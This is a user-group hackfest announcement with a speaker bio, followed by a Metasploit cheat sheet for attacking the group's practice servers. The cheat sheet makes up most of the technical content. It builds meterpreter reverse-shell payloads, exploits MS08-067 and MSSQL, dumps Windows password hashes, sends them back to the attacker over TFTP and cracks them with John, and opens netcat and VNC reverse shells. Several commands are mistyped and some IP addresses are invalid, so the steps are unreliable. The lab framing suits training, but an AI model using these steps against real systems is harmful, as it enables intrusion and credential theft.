CLOUD Targets/Rapid7 Scanner Presented

Steven Kaplan, MSC,  BSEE, CISSP, CISA,  (Senior Cyber Security Analyst, DOE  Palo Verde Nuclear Facility) will be presenting a full blown (licensed) version of Rapid 7, while letting us bust his cloud

Mr. Kaplan has extensive experience in all areas of computer and network security, from instructor to practitioner. His combined problem solving, insights, innovations, programming and integration techniques have saved companies (in some cases) millions of dollars in fines, avoided and achieved innovative process optimizations – gains not strictly limited to computer security.   Steven holds relevant industry CISA CISSP and Ethical Hacker certifications.  Steve's scope includes process automation, especially related to collecting network security vulnerabilities, user ID revalidation, within and without  HIPAA,  PCI and SOX compliance.

Activities over the last 20 years cover both Federal Government (NSA) INFOSEC experience and private sector work from National and International industries. Technological experience includes evaluation of Role Based Access Control (RBAC) systems, Java software review (for vulnerabilities), ethical hacking (EH) as well as design, evaluation, certification and accreditation (C&A) of security architectures and infrastructures. Evaluating varied systems and diverse integrated networks, including service-oriented architecture (SOA) for security vulnerabilities within legislative requirements for compliance keeps Mr. Kaplan from straight command line reverse engineering, perhaps his first love?  Audit experience includes review for compliance to Sarbanes-Oxley and HIPAA regulations, and the development of specialized software tools and scripts to expedite compliance.


During the day, I will be building Persistent BT4R2 USB pendrive keys for your software and network pentesting pleasure (bring 3GB or greater flash drive) as we move through Steve's extensive presentation content.  End result =  persistent Ubuntu BacktrackR42 !   I will be using my own ISO, so optionally bring your own MD5 checksum  to verify integrity.  

This will be a mixed format: Presentation/Lab (with full duplex audience communications so that the community provides content expansion and more).

Scott Becerra's  Layer 7 Web Flag Server will also be on hand (if you didn't get to pwn it last time), and will be available until Scott moves south to work for the Army, hopefully at least until Mid February.  We plan another Hamachi Hackfest to so we can enjoy Scott's company again ater he moves south.


Show up Saturday with your 3GB Flashdrive/Notebook and you might just need this CheatSheet to poke the PLUG Pentesting Exploit Training Servers/Cloud:

 HowTo's for basic Metasploit from Backtrack4R2:

0) Quick Windows MultiHandler Reverse Shell
 
startx
/etc/init.d/./wicd start
{check your wireless or wired connection is working}
mfspayload windows/meterpreter/reverse_tcp LHOST=192.168.1.666 LPORT=4444 >/root/payload.exe
optimize /root/putty.exe (for Windows target)
msfconsole
mfs> use exploit/multihander
mfs> set PAYLOAD windows/meterpreter/reverse_tcp
mfs> show options
mfs> set RHOST (local host ip)
mfs> shell go
mfsconsole > migrate <process #>
example  msfconsole > migrate 256
mfs> show explore
mfs> use name (from show explore)
mfs> set PAYLOAD
mfs> set RHOST
mfs> set LHOST

1) Nmap Mssql 2000
nmap -sT -0 10.10.10.254
nmap -sV 10.10.10.254
mfsconsole
show exploits
cut and paste with your mouse highlight
use mssql2000_resolution
set PAYLOAD win32_bind_meterpreter
show options
set RHOST (target) 10.10.10.254
exploit
help
execute -n Process
execute -f file
execute -f cmd -c
interact 1
ipconfig
see Menu---->System-->MISC--->TFTPD Server Start
On your Backtrack Linux shell:
cd /pentest/windows-binaries/tools
ls
cp PwDmp4.dll /tmp/PwDmp4.exe
cd /pentest/password/dictionaries
ls
cp wordlist.txt.gz /tmp/wordlist.txt
tftp -i 10.10.10.254 get PwDump4.dll (or exe)
tftp -i 10.10.10.254 get nc,exe
<go back to windows shell>
pwDmp4.exe
pwDmp4.exe \l \o:pwdmp4.txt
tftp 10.10.10.666 (our ip) put pwdmp4.txt
<back to linux BT environment shell>
cat pwdmp4.txt
john pwdmp4.txt
john -show pwdmp4.txt
john -w:wordlist.txt -f:NT pwdmp4.txt
<back to Windows>
nc -L -p 10.10.10.254
<back to BT linux shell>
telnet victim - login as Administrator with password

2) Quick VNC using Autopwn
mfsconsole
db_create foo
db_nmap <targetip or> 10.10.10.254
db_autopwn -h
db_autopwn -p -e
sessions -i 1
sysinfo
run vnc_oneport

3) Quick SMB (use another exploit if you like) & VNC Reverse Shell
mfsconsole
use windows/smb/ms08_067_netapi
show options
set PAYLOAD windows/vncinject/reverse_tcp
show options
set RHOST 10.10.10.254
show options
set LHOST 10.10.10.666
exploit
<spawns a shell on reverse machine>

4) Example using Nessus Plugins and db_autopwn
<shell>
apt-get install nessusd nessus
nessusd (takes about 10 minutes to start)
cd /pentest/exploits/framework3
svn update
./mfsconsole
<another shell>
./nessus
 Start a scan and Generate a Report
mfs> help
mfs> db_create /root/database/foobar.db
mfs> db_import
      Cross reference from report showing exploit port open and probable reported from Nessus
Save output of the Nessus report to /root/nessus.nbe
mfs> db_import_nessus_nbe /root/nessus.nbe
mfs> db_autopwn -p -e
Viola!


DISCLAIMER:  The use of Backtrack4R2 is advocated in pentest laboratories only and for fully qualified professionals in production systems only after written Corporate approval.  We do not advocate "cracking" and prefer the definition hacker in it's original term meaning those who reverse engineer and creatively find alternate uses for common IT systems. With group educational focus,  PLUG Hackfests do not advocate "learning to hack"; instead hacking to learn.

Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com the Second and Third Saturdays Noon - 3PM
Attend long enough and we morph into a team.
--

(503) 754-4452
(623) 688-3392

 http://www.obnosis.com


















--

(503) 754-4452
(623) 688-3392

 http://www.obnosis.com
Catch My MetaSploit & IP CAM Surveillence
Presentations @ ABLEConf.com in April!